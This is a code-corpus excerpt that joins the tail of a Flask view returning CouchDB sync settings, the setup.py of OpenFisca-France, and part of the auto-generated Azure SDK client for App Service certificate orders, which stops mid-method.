"dbname_user": SystemConfig.FILE_BOX_NAME_LOCAL,
})
else:
response['couchdb_sources'].append({
"name": _('consultant box'),
"url": current_app.config['COUCH_DB_URL'],
"dbname": '%s_%s' % (SystemConfig.DOWNLOAD_BOX_NAME, g.user.id),
"username": 'user_%d' % g.user.id,
"password": g.user.authproxy_token,
"writable": False,
"dbname_user": SystemConfig.DOWNLOAD_BOX_NAME_LOCAL,
})
response['couchdb_sources'].append({
"name": _('uploadbox'),
"url": current_app.config['COUCH_DB_URL'],
"dbname": '%s_%s' % (SystemConfig.UPLOAD_BOX_NAME, g.user.id),
"username": 'user_%d' % g.user.id,
"password": g.user.authproxy_token,
"writable": True,
"dbname_user": SystemConfig.UPLOAD_BOX_NAME_LOCAL,
})
if current_app.config['PARCEL_SEARCH_DATABASE_URI']:
response['parcel_search_url'] = url_for('search.query', token=g.user.authproxy_token, _external=True)
response['logging'] = {
'url': url_for('logserv.log', user_token=g.user.authproxy_token, _external=True),
}
response['update_coverage'] = {
'url': url_for('authproxy.update_download_coverage',
user_token=g.user.authproxy_token,
_external=True
),
}
response['user'] = {
'email': g.user.email,
'type': g.user.type,
'type_name': g.user.type_name,
}
return json.dumps(response)
| apache-2.0 |
adrienpacifico/openfisca-france | setup.py | 1 | 1776 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
""" -- a versatile microsimulation free software"""
from setuptools import setup, find_packages
setup(
name = 'OpenFisca-France',
version = '0.5.4.dev0',
author = 'OpenFisca Team',
author_email = '[email protected]',
classifiers = [
"Development Status :: 2 - Pre-Alpha",
"License :: OSI Approved :: GNU Affero General Public License v3",
"Operating System :: POSIX",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Information Analysis",
],
description = u'French tax and benefit system for OpenFisca',
keywords = 'benefit france microsimulation social tax',
license = 'http://www.fsf.org/licensing/licenses/agpl-3.0.html',
url = 'https://github.com/openfisca/openfisca-france',
data_files = [
('share/locale/fr/LC_MESSAGES', ['openfisca_france/i18n/fr/LC_MESSAGES/openfisca-france.mo']),
('share/openfisca/openfisca-france', ['CHANGELOG.md', 'LICENSE', 'README.md']),
],
extras_require = {
'inversion_revenus': [
'scipy >= 0.12',
],
'taxipp': [
'pandas >= 0.13',
],
'test': [
'nose',
],
},
include_package_data = True, # Will read MANIFEST.in
install_requires = [
'Babel >= 0.9.4',
'Biryani[datetimeconv] >= 0.10.4',
'numpy >= 1.6,< 1.10',
'OpenFisca-Core >= 0.5.0',
'PyYAML >= 3.10',
'requests >= 2.8',
],
message_extractors = {'openfisca_france': [
('**.py', 'python', None),
]},
packages = find_packages(exclude=['openfisca_france.tests*']),
test_suite = 'nose.collector',
)
| agpl-3.0 |
Azure/azure-sdk-for-python | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2018_02_01/operations/_app_service_certificate_orders_operations.py | 1 | 76895 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, List, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class AppServiceCertificateOrdersOperations(object):
"""AppServiceCertificateOrdersOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.web.v2018_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.AppServiceCertificateOrderCollection"]
"""List all certificate orders in a subscription.
List all certificate orders in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServiceCertificateOrderCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrderCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrderCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('AppServiceCertificateOrderCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.CertificateRegistration/certificateOrders'} # type: ignore
def validate_purchase_information(
self,
app_service_certificate_order, # type: "_models.AppServiceCertificateOrder"
**kwargs # type: Any
):
# type: (...) -> None
"""Validate information for a certificate order.
Validate information for a certificate order.
:param app_service_certificate_order: Information for a certificate order.
:type app_service_certificate_order: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrder
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.validate_purchase_information.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(app_service_certificate_order, 'AppServiceCertificateOrder')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
validate_purchase_information.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.CertificateRegistration/validateCertificateRegistrationInformation'} # type: ignore
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.AppServiceCertificateOrderCollection"]
"""Get certificate orders in a resource group.
Get certificate orders in a resource group.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServiceCertificateOrderCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrderCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrderCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('AppServiceCertificateOrderCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders'} # type: ignore
def get(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateOrder"
"""Get a certificate order.
Get a certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order..
:type certificate_order_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceCertificateOrder, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrder
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrder"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
certificate_distinguished_name, # type: "_models.AppServiceCertificateOrder"
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateOrder"
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrder"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(certificate_distinguished_name, 'AppServiceCertificateOrder')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
certificate_distinguished_name, # type: "_models.AppServiceCertificateOrder"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.AppServiceCertificateOrder"]
"""Create or update a certificate purchase order.
Create or update a certificate purchase order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param certificate_distinguished_name: Distinguished name to use for the certificate order.
:type certificate_distinguished_name: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrder
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either AppServiceCertificateOrder or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrder]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrder"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
certificate_order_name=certificate_order_name,
certificate_distinguished_name=certificate_distinguished_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}'} # type: ignore
def delete(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Delete an existing certificate order.
Delete an existing certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}'} # type: ignore
def update(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
certificate_distinguished_name, # type: "_models.AppServiceCertificateOrderPatchResource"
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateOrder"
"""Create or update a certificate purchase order.
Create or update a certificate purchase order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param certificate_distinguished_name: Distinguished name to use for the certificate order.
:type certificate_distinguished_name: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrderPatchResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceCertificateOrder, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrder
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrder"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(certificate_distinguished_name, 'AppServiceCertificateOrderPatchResource')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}'} # type: ignore
def list_certificates(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.AppServiceCertificateCollection"]
"""List all certificates associated with a certificate order.
List all certificates associated with a certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServiceCertificateCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_certificates.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('AppServiceCertificateCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_certificates.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates'} # type: ignore
def get_certificate(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateResource"
"""Get the certificate associated with a certificate order.
Get the certificate associated with a certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param name: Name of the certificate.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceCertificateResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
# Construct URL
url = self.get_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'} # type: ignore
def _create_or_update_certificate_initial(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
name, # type: str
key_vault_certificate, # type: "_models.AppServiceCertificateResource"
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateResource"
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_certificate_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(key_vault_certificate, 'AppServiceCertificateResource')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_certificate_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'} # type: ignore
def begin_create_or_update_certificate(
self,
resource_group_name, # type: str
